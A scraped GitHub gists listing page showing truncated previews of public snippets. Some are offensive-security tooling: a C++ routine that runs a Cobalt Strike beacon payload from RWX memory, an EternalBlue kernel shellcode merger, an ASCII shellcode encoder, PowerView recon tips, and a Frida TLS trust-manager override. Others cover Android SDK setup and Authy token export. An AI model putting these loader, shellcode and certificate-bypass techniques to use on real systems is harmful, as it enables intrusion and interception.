Skip to content

Instantly share code, notes, and snippets.

View marksee's full-sized avatar

Mark marksee

44 followers · 128 following
  • Chicago
View GitHub Profile
@manasmbellani
manasmbellani / veracode.py
Last active October 27, 2020 22:37
Script to perform multiple functions using Veracode including addition of users, reporting, listing users and teams. Make sure you populate the <SAML USER ID> which is a special ID prepended to users that use SAML for cleaner output when listing users. Also, required is the ability to ensure that Veracode API can be accessed from the IP address …
#!/usr/bin/env python3
import sys
import csv
import os
import json
import subprocess
import shlex
import requests
from xml.etree import ElementTree
@xpn
xpn / external_client_filetransfer.cpp
Created March 28, 2018 22:10
#include "stdafx.h"
// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread
void spawnBeacon(char *payload, DWORD len) {
HANDLE threadHandle;
DWORD threadId = 0;
char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(alloc, payload, len);
@agrcrobles
agrcrobles / android_instructions_29.md
Last active February 15, 2025 21:03 — forked from patrickhammond/android_instructions.md
Setup Android SDK on OSX with and without the android studio

Hi, I am a fork from https://gist.github.com/patrickhammond/4ddbe49a67e5eb1b9c03.

A high level overview for what I need to do to get most of an Android environment setup and maintained on OSX higher Catalina and Big Sur with and without Android Studio been installed.

Considering the SDK is installed under /Users/<your_user>/Library/Android/sdk folder which is the Android Studio preferred SDK location, but it works fine under /usr/local/share/android-sdk as well, which is a location pretty much used on CI mostly.

Prerequisites:

https://github.com/shyiko/jabba instead ?

@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active October 24, 2025 09:41
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@gboudreau
gboudreau / AuthyToOtherAuthenticator.md
Last active October 25, 2025 16:56 — forked from Ingramz/AuthyToOtherAuthenticator.md
Export TOTP tokens from Authy

Exporting your 2FA tokens from Authy to transfer them into another 2FA application

IMPORTANT - Update regarding deprecation of Authy desktop apps

Past August 2024, Authy stopped supported the desktop version of their apps:
See Authy is shutting down its desktop app | The 2FA app Authy will only be available on Android and iOS starting in August for details.

And indeed, after a while, Authy changed something in their backend which now prevents the old desktop app from logging in. If you are already logged in, then you are in luck, and you can follow the instructions below to export your tokens.

If you are not logged in anymore, but can find a backup of the necessary files, then restore those files, and re-install Authy 2.2.3 following the instructions below, and it should work as expected.

@curi0usJack
curi0usJack / twitterfavlinks.py
Last active May 3, 2020 07:58
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active October 18, 2025 23:58
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@oleavr
oleavr / trust-manager.js
Created June 8, 2017 13:49
How to implement an X509TrustManager using Frida
'use strict';
var TrustManager;
var manager;
Java.perform(function () {
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
TrustManager = Java.registerClass({
name: 'com.example.TrustManager',
@worawit
worawit / eternalblue_merge_shellcode.py
Last active April 3, 2024 12:25
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
@mgeeky
mgeeky / ascii-shellcode-encoder.py
Last active September 12, 2024 06:52
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving